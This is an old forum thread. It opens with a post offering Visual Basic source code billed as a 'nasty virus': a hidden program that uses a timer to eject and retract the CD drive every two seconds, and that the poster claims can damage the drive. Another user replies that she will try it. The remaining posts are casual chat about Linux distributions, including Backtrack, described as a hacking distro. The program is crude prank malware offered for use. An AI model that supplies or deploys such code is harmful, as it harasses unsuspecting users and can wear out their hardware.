Page 1 of 4
source code for an excellent virus(VB)
Posted: Tue Aug 28, 2007 3:30 am
by treborguile
Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Posted: Tue Aug 28, 2007 4:02 am
by alina
wow ths i will try it..hope i can do that

anyway ths
Posted: Tue Aug 28, 2007 7:57 am
by <<D.A.>>
Yeah, linux REALLY lacks software... VIRUSES!

It doesn't support viruses!

Posted: Tue Aug 28, 2007 8:27 am
by treborguile
<<D.A.>> wrote:Yeah, linux REALLY lacks software... VIRUSES!

It doesn't support viruses!

hahaha doesn't support viruses??
Posted: Tue Aug 28, 2007 8:50 am
by alina
but guys i had linux and i don't like it at all ..is it so good? ..mine worked for an hour then i had to change it...

Posted: Tue Aug 28, 2007 9:17 am
by <<D.A.>>
For an hour? Let me gues... It was Mandriva Linux 2007.1? Am i right?

Posted: Tue Aug 28, 2007 9:33 am
by alina

well yes..
Posted: Tue Aug 28, 2007 9:42 am
by <<D.A.>>

This is one of the worst Linux distributions there ever was. Ain't nothing works in there. You should try Slackware linux 12. Also you can try Backtrack 2 - Linux distribution specially designed for hackers (especially for blackhat

). It's a liveCD distribution, so you don't even have to install it to use it - it boots from CD. But it lacks such thungs as office suite and other useful software.
Posted: Tue Aug 28, 2007 10:06 am
by alina
wow ths a lot ..stupid me

well....this is me sometimes stupid sometimes smart

Posted: Tue Aug 28, 2007 12:40 pm
by <<D.A.>>
Take it easy... Most of Linux newbies google for 'linux download'. And, probably, the first link is Mandriva Linux... For example, I've been using that distro for a few month, until it crashed, only then I started looking for some other distro...
Posted: Tue Aug 28, 2007 12:48 pm
by alina
ths u are the best i will look for the ones u said ...huggsss

Posted: Wed Aug 29, 2007 12:38 am
by treborguile
hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too

Posted: Wed Aug 29, 2007 6:18 pm
by jack krauser
treborguile wrote:hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too

i will search and tell you

Posted: Wed Aug 29, 2007 6:49 pm
by alina
ok i will search it too ths ...

Posted: Wed Aug 29, 2007 9:09 pm
by jack krauser
treborguile wrote:hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too

it's very good
